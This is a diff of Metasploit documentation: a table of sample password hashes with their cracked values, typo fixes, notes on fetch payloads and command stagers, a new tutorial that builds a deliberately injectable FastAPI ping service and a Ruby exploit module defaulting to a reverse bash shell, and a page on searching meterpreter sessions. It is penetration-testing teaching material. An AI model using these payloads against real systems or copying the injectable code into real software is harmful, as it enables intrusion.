-| MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12          | auxiliary/scanner/mssql/mssql_hashdump           | auxiliary/analyze/crack_databases                         |
-| MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql            | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
-| MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1       | auxiliary/scanner/mysql/mysql_hashdump           | auxiliary/analyze/crack_databases                         |
-| Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle       | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
-| Oracle                               | SYSTEM             | `9EEDFA0AD26C6D52`                                                                                                                                                                                                                                                     | THALES       | des,oracle       | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
-| Oracle 11                            | DEMO               | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle  | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
-| Oracle 11                            | oracle11_epsilon   | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle  | modules/auxiliary/scanner/oracle/oracle_hashdump | auxiliary/analyze/crack_databases                         |
-| Oracle 12                            | oracle12_epsilon   | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B`                                                                | epsilon      | pbkdf2,oracle12c | auxiliary/scanner/oracle/oracle_hashdump         | auxiliary/analyze/crack_databases                         |
-| Postgres                             | example            | `md5be86a79bf2043622d58d5453c47d4860`                                                                                                                                                                                                                                  | password     | raw-md5,postgres | auxiliary/scanner/postgres/postgres_hashdump     | auxiliary/analyze/crack_databases                         |
-| HMAC-MD5                             | hmac_password      | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9`                                                                                                                                                                                                              | password     | hmac-md5         | auxiliary/server/capture/smtp                    | None                                                      |
-| SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap        | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6`                                                                                    | TestPass123# | dynamic_82       |                                                  | None                                                      |  |  |
+|   | Hash Type                            | Username           | Hash                                                                                                                                                                                                                                                                   | Password     | jtr format         | Modules which dump this info                      | Modules which crack this                                  |   |   |   |
+|---|--------------------------------------|--------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|--------------|--------------------|---------------------------------------------------|-----------------------------------------------------------|---|---|---|
+|   | DES                                  | des_password       | `rEK1ecacw.7.c`                                                                                                                                                                                                                                                        | password     | des                |                                                   | auxiliary/analyze/crack_aix auxiliary/analyze/crack_linux |   |   |   |
+|   | MD5                                  | md5_password       | `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/`                                                                                                                                                                                                                                   | password     | md5                |                                                   | auxiliary/analyze/crack_linux                             |   |   |   |
+|   | BSDi                                 | bsdi_password      | `_J9..K0AyUubDrfOgO4s`                                                                                                                                                                                                                                                 | password     | bsdi               |                                                   | auxiliary/analyze/crack_linux                             |   |   |   |
+|   | SHA256                               | sha256_password    | `$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5`                                                                                                                                                                                                              | password     | sha256,crypt       |                                                   | auxiliary/analyze/crack_linux                             |   |   |   |
+|   | SHA512                               | sha512_password    | `$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1`                                                                                                                                                                   | password     | sha512,crypt       |                                                   | auxiliary/analyze/crack_linux                             |   |   |   |
+|   | Blowfish                             | blowfish_password  | `$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe`                                                                                                                                                                                                         | password     | bf                 |                                                   | auxiliary/analyze/crack_linux                             |   |   |   |
+|   | Lanman                               | lm_password        | `E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | lm                 |                                                   | auxiliary/analyze/crack_windows                           |   |   |   |
+|   | NTLM                                 | nt_password        | `AAD3B435B51404EEAAD3B435B51404EE:8846F7EAEE8FB117AD06BDD830B7586C`                                                                                                                                                                                                    | password     | nt                 |                                                   | auxiliary/analyze/crack_windows                           |   |   |   |
+|   | NetNTLMv1                            | u4-netntlm         | `u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c`                                                                                                                                   | hashcat      | netntlm            |                                                   | auxiliary/analyze/crack_windows                           |   |   |   |
+|   | NetNTLMv2                            | admin              | `admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030`                                                                                       | hashcat      | netntlmv2          |                                                   | auxiliary/analyze/crack_windows                           |   |   |   |
+|   | MSSQL (2005)                         | mssql05_toto       | `0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908`                                                                                                                                                                                                               | toto         | mssql05            | auxiliary/scanner/mssql/mssql_hashdump            | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | MSSQL                                | mssql_foo          | `0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254`                                                                                                                                                                       | foo          | mssql              | auxiliary/scanner/mssql/mssql_hashdump            | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | MSSQL (2012)                         | mssql12_Password1! | `0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16`                                                                                                                       | Password!    | mssql12            | auxiliary/scanner/mssql/mssql_hashdump            | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | MySQL                                | mysql_probe        | `445ff82636a7ba59`                                                                                                                                                                                                                                                     | probe        | mysql              | auxiliary/scanner/mysql/mysql_hashdump            | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | MySQL SHA1                           | mysql-sha1_tere    | `*5AD8F88516BD021DD43F171E2C785C69F8E54ADB`                                                                                                                                                                                                                            | tere         | mysql-sha1         | auxiliary/scanner/mysql/mysql_hashdump            | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | Oracle                               | simon              | `4F8BC1809CB2AF77`                                                                                                                                                                                                                                                     | A            | des,oracle         | auxiliary/scanner/oracle/oracle_hashdump          | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | Oracle                               | SYSTEM             | `9EEDFA0AD26C6D52`                                                                                                                                                                                                                                                     | THALES       | des,oracle         | auxiliary/scanner/oracle/oracle_hashdump          | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | Oracle 11                            | DEMO               | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle    | auxiliary/scanner/oracle/oracle_hashdump          | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | Oracle 11                            | oracle11_epsilon   | `S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C` | epsilon      | raw-sha1,oracle    | modules/auxiliary/scanner/oracle/oracle_hashdump  | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | Oracle 12                            | oracle12_epsilon   | `H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B`                                                                | epsilon      | pbkdf2,oracle12c   | auxiliary/scanner/oracle/oracle_hashdump          | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | Postgres                             | example            | `md5be86a79bf2043622d58d5453c47d4860`                                                                                                                                                                                                                                  | password     | raw-md5,postgres   | auxiliary/scanner/postgres/postgres_hashdump      | auxiliary/analyze/crack_databases                         |   |   |   |
+|   | HMAC-MD5                             | hmac_password      | `<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9`                                                                                                                                                                                                              | password     | hmac-md5           | auxiliary/server/capture/smtp                     | None                                                      |   |   |   |
+|   | SHA512($p.$s)/dynamic_82/vmware ldap | vmware_ldap        | `$dynamic_82$a702505b8a67b45065a6a7ff81ec6685f08d06568e478e1a7695484a934b19a28b94f58595d4de68b27771362bc2b52444a0ed03e980e11ad5e5ffa6daa9e7e1$HEX$171ada255464a439569352c60258e7c6`                                                                                    | TestPass123# | dynamic_82         |                                                   | None                                                      |   |   |   |
+|   | pbkdf2-sha256                        | admin              | `$pbkdf2-sha256$260000$Q1hzYjU5dFNMWm05QUJCTg$s.vmjGlIV0ZKV1Sp3dTdrcn/i9CTqxPZ0klve4HreeU`                                                                                                                                                                             | admin        | PBKDF2-HMAC-SHA256 | exploit/linux/http/apache_superset_cookie_sig_rce | auxiliary/analyze/webapp                                  |   |   |   |

 # Adding a New Hash

 Only hashes which were found in Metasploit were added to the hash id library, and the other functions.  New hashes are developed often, and new modules which find a new type of hash will most definitely be created.  So what are the steps to add a new hash type to Metasploit?

-1. Add a new identify algorithm to: [framework/hashes/identify.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/hashes/identify.rb).  You may want to consult external programs such as `hashid` or `hash-identifier` for suggestions.
+1. Add a new identify algorithm to: [framework/hashes.rb](https://github.com/rapid7/metasploit-framework/blob/master/lib/metasploit/framework/hashes.rb).  You may want to consult external programs such as `hashid` or `hash-identifier` for suggestions.
    1. Add the hash to the spec to ensure it works right now, and in future updates: [framework/hashes/identify_spec.rb](https://github.com/rapid7/metasploit-framework/blob/master/spec/lib/metasploit/framework/hashes/identify_spec.rb)
 1. Make sure the hashes are saved in the DB in the JTR format.  A good source to identify what the hashes look like is [pentestmonkey](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats).
 1. If applicable, add it into the appropriate cracker module (or create a new one).  Example for [Windows related hashes](https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/analyze/crack_windows.rb).
@@ -62,9 +62,9 @@ res = @http_client.send_request_cgi({
 The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.

 ### `cookie` option
-Shown below is the request used to login to a gitlab account in the [artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
+Shown below is the request used to login to a gitlab account in the [artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)

-artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.
+artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.

 ```ruby
 res = send_request_cgi({
@@ -24,7 +24,7 @@ int main(void) {
 require 'metasploit/framework/compiler/windows'


-## Save as an exe varibale
+## Save as an exe variable
 exe = Metasploit::Framework::Compiler::Windows.compile_c(c_template)

 ## Save the binary as a file
@@ -119,4 +119,4 @@ int main() {
 outfile = "/tmp/helloworld.exe"
 weight = 70 # This value is used to determine how random the code gets.
 Metasploit::Framework::Compiler::Windows.compile_random_c_to_file(outfile, c_source_code, weight: weight)
-```
+```
@@ -279,7 +279,7 @@ msf exploit(cmdstager_demo) > run
 # Flavors

 Now that we know how to use the `Msf::Exploit::CmdStager` mixin, let's take a look at the command
-stagers you can use.  As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to wite a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit.  It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.
+stagers you can use.  As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to write a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit.  It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.

 Available flavors:

@@ -31,10 +31,11 @@ Here is the naming convention for fetch payloads:
 `<cmd>/<platform>/<fetch protocol>/served_payload`
 For example:
 `cmd/linux/https/x64/meterpreter/reverse_tcp` Will do four things:
-1) Create a `linux/x64/meterpreter/reverse_tcp` elf binary to be the served payload.
-2) Serve the above served payload on an HTTPS server
-3) Start a served payload handler for the served payload to call back to
-4) Generate a command to execute on a remote host that will download the served payload and run it.
+
+1. Create a `linux/x64/meterpreter/reverse_tcp` elf binary to be the served payload.
+2. Serve the above served payload on an HTTPS server
+3. Start a served payload handler for the served payload to call back to
+4. Generate a command to execute on a remote host that will download the served payload and run it.


 ## A Simple Stand-Alone Example
@@ -20,7 +20,7 @@ When the mixin is included, notice there will be the following datastore options
 * **SSLVerifyMode** - Verification mode: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER. Default is PEER.
 * **Proxies** - Allows your module to support proxies.
 * **ConnectTimeout** - Default is 10 seconds.
-* **TCP::max_send_size** - Evasive option. Maxiumum TCP segment size.
+* **TCP::max_send_size** - Evasive option. Maximum TCP segment size.
 * **TCP::send_delay** - Evasive option. Delays inserted before every send.

 If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"
@@ -126,4 +126,4 @@ def send_recv_once(data)

  buf
 end
-```
+```
@@ -84,7 +84,7 @@ module Metasploit
      class SymantecWebGateway < HTTP


-        # Attemps to login to the server.
+        # Attempts to login to the server.
        #
        # @param [Metasploit::Framework::Credential] credential The credential information.
        # @return [Result] A Result object indicating success or failure
@@ -68,7 +68,7 @@ def on_request_uri(cli, request)
 end
 ```

-Of course, when you write a Metasploit browser exploit there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provies all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or checkout existing code examples (especially the recent ones).
+Of course, when you write a Metasploit browser exploit there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provides all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or checkout existing code examples (especially the recent ones).

 To get things started, you can always use the following template to start developing your browser exploit:

@@ -37,6 +37,10 @@ The `CheckCode` also supports an optional description which is printed by the fr
 return CheckCode::Appears('Vulnerable component XYZ is installed')
 ```

+`MetasploitModule#check` methods should capture any known `raise` from methods called and return value of class
+`Msf::Exploit::CheckCode`. Basically, that means avoiding the use of `fail_with` or raising exceptions that are not
+handled within the check method.
+
 ## Remote Check Example

 Here's an abstract example of how a Metasploit check might be written:
@@ -54,7 +58,7 @@ def check
  http_body = get_http_body
  if http_body
    if http_body =~ /Something CMS v1\.0/
-      # We are able to find the version thefore more precise about the vuln state
+      # We are able to find the version therefore more precise about the vuln state
      return Exploit::CheckCode::Appears
    elsif http_body =~ /Something CMS/
      # All we can tell the vulnerable app is running, but no more info to
@@ -0,0 +1,210 @@
+If you've found a way to execute a command on a target, and you'd like to make a simple exploit module to get a shell, this guide is for you. Alternatively, if you have access to **fetch** commands on the target (curl, wget, ftp, tftp, tnftp, or certutil), you can use a [[Fetch Payload|How-to-use-fetch-payloads]] for a no-code solution.
+
+By the end of this guide you'll understand how to turn [Command injection](https://owasp.org/www-community/attacks/Command_Injection) into a shell - from here, you can move on to the [[command stager|How-to-use-command-stagers]] article and upgrade your basic `:unix_cmd` Target to a Dropper for all kinds of payloads with variable command stagers.
+
+This guide assumes *some* knowledge of programming (Understand what a class is, what methods/functions are) but expects no in-depth knowledge of Metasploit internals.
+
+## A Vulnerable Service
+
+For the vulnerable service test case, we'll be using a simple FastAPI service. This is very easy to spin up:
+
+1. Install `fastapi[all]` using your preferred Python package manager (a virtual environment is recommended)
+2. Create a file to hold some Python code (I'll call it `main.py`)
+3. Copy the following code into your file:
+
+    ```python
+    from fastapi import FastAPI, Response
+    import subprocess
+
+    app = FastAPI()
+
+    @app.get("/ping")
+    def ping(ip : str):
+        res = subprocess.run(f"ping -c 1 {ip}", shell=True, capture_output=True)
+        return Response(content=res.stdout.decode("utf-8"), media_type="text/plain")
+    ```
+
+4. Start your vulnerable service with `uvicorn main:app`
+5. Test that the application works with `curl`:
+
+    ```sh
+    $ curl http://localhost:8000/ping?ip=1.1.1.1
+    PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
+    64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.7 ms
+
+    --- 1.1.1.1 ping statistics ---
+    1 packets transmitted, 1 received, 0% packet loss, time 0ms
+    rtt min/avg/max/mdev = 16.739/16.739/16.739/0.000 ms
+    ```
+
+6. Test that your application is exploitable - also with `curl`:
+
+    ```sh
+    $ curl localhost:8000/ping?ip=1.1.1.1%20%26%26id
+    PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
+    64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.6 ms
+
+    --- 1.1.1.1 ping statistics ---
+    1 packets transmitted, 1 received, 0% packet loss, time 0ms
+    rtt min/avg/max/mdev = 16.614/16.614/16.614/0.000 ms
+    uid=1000(meta) gid=1000(meta)
+    ```
+
+With this output `uid=1000(meta) gid=1000(meta)`, we know that the `id` command successfully executed on the target system. Now that we have a vulnerable application we can write a module to pwn it.
+
+## The Structure of a Module
+
+To have a functioning command injection Metasploit module we **need** a few things:
+
+1. Create a subclass of `Msf::Exploit::Remote`
+2. Include the `Msf::Exploit::Remote::HttpClient` mixin
+3. Define three methods:
+   - `initialize`, which defines metadata for the Module
+   - `execute_command`, which is what runs the command against the remote server
+   - `exploit`, wraps `execute_command`, and can handle some logic when we move to a cmdstager module
+4. (Not required, but recommended) a method to substitute or escape bad characters, to be used inside `execute_command`. This could also just be done inside `execute_command` instead of a separate function call.
+
+### Where to put a Module
+
+Metasploit looks for custom modules at `$HOME/.msf4/modules`, but the way you get modules there varies based on how you're running Metasploit.
+
+- If you have a full install of Metasploit on your host, you can just add your custom module to `$HOME/.msf4/modules/exploits/custom_mod.rb`.
+  - You can also just add a module to Metasploit's modules folder - This can be helpful when troubleshooting, but it's not recommended
+- **Docker** If you're using the [Docker Image](https://github.com/rapid7/metasploit-framework/tree/master/docker), you can also add modules to `$HOME/.msf4/modules` and that folder will be mounted as a volume inside the Docker container
+  - You can also change the mount point by modifying the [docker-compose](https://github.com/rapid7/metasploit-framework/blob/master/docker-compose.yml) file
+
+For testing, the easiest thing to do is the simplest. You can find Metasploit's **exploit** directory, copy a file, rename it, and go from there.
+
+## A Shell of a Module
+
+The shell of a module that follows the above format is something like this:
+
+```ruby
+class MetasploitModule < msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    # empty for now
+  end
+
+  def filter_bad_chars(cmd)
+    # empty for now
+  end
+
+  def execute_command(cmd, _opts = {})
+    # empty for now
+  end
+
+  def exploit
+    # empty for now
+  end
+end
+```
+
+This covers every essential point from [The Structure of a Module](#the-structure-of-a-module), although it won't run yet.
+
+## Initialize
+
+The `initialize` method is used to define and pass metadata. Every `initialize` method in the metasploit-framework codebase follows the format of an empty `info` being passed into `update_info`, which gets passed to the `msf::Exploit::Remote` `initialize` method:
+
+```ruby
+def initialize(info = {})
+  super(
+    update_info(
+      info,
+      # Here is where the metadata goes
+      'Name' => 'Command Injection against a test Ping endpoint',
+      'Description' => 'This exploits a command injection vulnerability against a test application',
+      'License' => MSF_LICENSE,
+      'Author' => 'YOUR NAME',
+      'References' => [
+        ['URL', 'https://metasploit.com/']
+      ],
+      'DisclosureDate' => '2023-08-04',
+      'Platform' => 'linux', # used for determining compatibility - if you're doing code injection, this may be the language of the webapp
+      'Targets' => [
+        'Unix Command',
+        {
+          'Platform' => ['linux', 'unix'], # linux and unix have different cmd payloads, this gives you more options
+          'Arch' => ARCH_CMD,
+          'Type' => :unix_cmd, # Running a command - this would be `:linux_dropper` for a cmdstager dropper
+          'DefaultOptions' => {
+            'PAYLOAD' => 'cmd/unix/reverse_bash',
+            'RPORT' => 8000,
+          }
+        }
+      ],
+      'Payload' => {
+        'BadChars' => '\x00',
+      }
+      'Notes' => { # Required for new modules https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Stability' => [CRASH_SAFE],
+        'Reliability' => [REPEATABLE_SESSION],
+        'SideEffects' => [IOC_IN_LOGS]
+      }
+      # Some more metadata options are here: https://docs.metasploit.com/docs/development/developing-modules/module-metadata/module-reference-identifiers.html#code-example-of-references-in-a-module
+    )
+  )
+end
+```
+
+All that this method does is register metadata to the module.
+
+## Filtering
+
+It's important to ensure that payloads being sent are properly encoded. As an example, if you send a request to the `/ping` endpoint that looks like `/ping?ip=1.1.1.1&&id`, you won't see the "uid=1000(meta) gid=1000(meta)" in the response because `&` is a special character in HTTP.
+
+Encoding requirements might change based on the application you're trying to inject, so experiment if things aren't working.
+
+```ruby
+def filter_bad_chars(cmd)
+  return cmd
+    .gsub(/&/, '%26')
+    .gsub(/ /, '%20')
+end
+```
+
+`filter_bad_chars` takes in `cmd`, which is a string. `cmd` has two substitutions applied - the first will translate `&` to `%26`, the second translates a space to `%20`. The `.gsub` statements are a global substitution across the string, so the entire payload is impacted by the substitutions here (Similar to str.replace in Python). Regardless of whether or not the string is modified, it is returned.
+
+## Execution
+
+The `execute_command` method takes in `cmd` and `_opts` and executes the command on the target. In our case, executing a command is simply adding the command to a GET request and sending it to the `/ping` endpoint on our sample service.
+
+```ruby
+def execute_command(cmd, _opts = {})
+  send_request_cgi({
+    'method' => 'GET',
+    'uri' => '/ping',
+    'encode_params' => false,
+    'vars_get' => {
+      'ip' => "bing.com%20%26%26%20#{filter_bad_chars(cmd)}",
+    }
+  })
+end
+```
+
+We don't even need to handle the output of `send_request_cgi` (Really, there should be no return until the shell exits, since the call to `subprocess.run` doesn't return until that shell dies).
+
+## Exploitation
+
+To finish up, all we need is to define the `exploit` method. This method is called by Metasploit when you use `run` within a msfconsole. All that we'll do here is print a little status message and run the exploit, but later you can modify this method to handle droppers as well:
+
+```ruby
+def exploit
+  print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+  execute_command(payload.encoded)
+end
+```
+
+If you're running Metasploit and the vulnerable Python service on the same machine, you should be able to simply set the variables and fire:
+
+```sh
+set RHOST 127.0.0.1
+set LHOST 127.0.0.1
+run
+```
+
+## Conclusion
+
+That's it. Put it all together and you have a very simple Command Injection exploit module that shows you the basics of how to throw a payload. Play around with different payloads, follow the [[How-to-use-command-stagers]] guide, add some logging to the Python web server, and watch executions over Wireshark. You'll learn a lot.
@@ -16,7 +16,7 @@ If listeners are externalized, then there is an API layer both for interactive i

 ### Integration of native tool-chains

-Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a diffcult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.
+Tools like Veil, pwnlib, etc. have for a long time used native compilers and tooling to build payloads and evasions. Metasploit has opted mostly for native Ruby solutions, though it does have some implicit runtime dependencies like `apktool` for Android payload injection. However, these tools are getting harder to maintain and use (e.g. metasm has a difficult time building any non-trivial C code, we just spent a month fixing a bug it had with Ruby 2.5 and Windows). It would be nice to have either be able to depend on a set of first-class toolchains being available in the environment, or have some way to package them natively with Metasploit itself. A full suite of compilers and tools does consume considerable amounts of space (e.g. mettle's toolchain is 1.8GB uncompressed), but this is probably less of a problem than it was 15 years ago.

 ### Native first-class UUID-aware, async stager payload

@@ -26,7 +26,7 @@ Make a new async payload type (based on pingback payload work) making secure com

 ### Overhaul network targeting

-Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart futher. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:
+Setting at least 5 variables RHOSTS/RPORT/SSL/VHOST/SSL_Version/User/Pass/etc... to target a single web application is very cumbersome. When these variables also do not apply to multiple RHOSTS exactly, the scheme of multiple variables falls apart further. Metasploit should be able to target URLs directly, that can all have their own independent ports, users, hostnames, etc:

 ```
 set TARGETS https://user:password@target_app:4343 https://target_app2
@@ -0,0 +1,62 @@
+## Sessions Command
+
+### Session Search
+
+When you have a number of sessions open, searching can be a useful tool to navigate them. This guide explains what capabilities are available for navigating open sessions with search.
+
+You can get a list of sessions matching a specific criteria within msfconsole:
+
+```msf
+msf6 payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_id:2"
+Active sessions
+===============
+
+  Id  Name  Type                     Information                                    Connection
+  --  ----  ----                     -----------                                    ----------
+  1         meterpreter x86/windows  WIN-ED9KFH65RDH\Zach Goldman @WIN-ED9KFH65RDH  192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132)                                         
+                                                      
+```
+
+Currently, the only supported keywords for search are `session_id`, `session_type`, and `last_checkin`. These keywords can be combined to further filter your results, and used with other flags. For example:
+
+```msf
+msf6 payload(windows/meterpreter/reverse_http) > sessions --search "session_id:1 session_type:meterpreter last_checkin:greater_than:10s last_checkin:less_than:10d5h2m30s" -v
+
+Active sessions
+===============
+
+  Session ID: 1
+        Name:
+        Type: meterpreter windows
+        Info: WIN-ED9KFH65RDH\Zach Goldman @ WIN-ED9KFH65RDH
+      Tunnel: 192.168.2.1:4444 -> 192.168.2.132:52190 (192.168.2.132)
+         Via: exploit/multi/handler
+   Encrypted: Yes (AES-256-CBC)
+        UUID: 958f7b976db67d60/x86=1/windows=1/2023-10-19T12:38:05Z
+     CheckIn: 21725s ago @ 2023-10-19 09:26:08 -0500
+  Registered: No
+
+```
+
+Of note in the above example, `last_checkin` requires an extra argument. The second argument must be either `greater_than` or `less_than`. The third argument can be a sequence of alternating amounts and units of time (d: days, h: hours, m: minutes, and s: seconds), i.e. `5m2s`, `10d`, or `1d5m`.
+
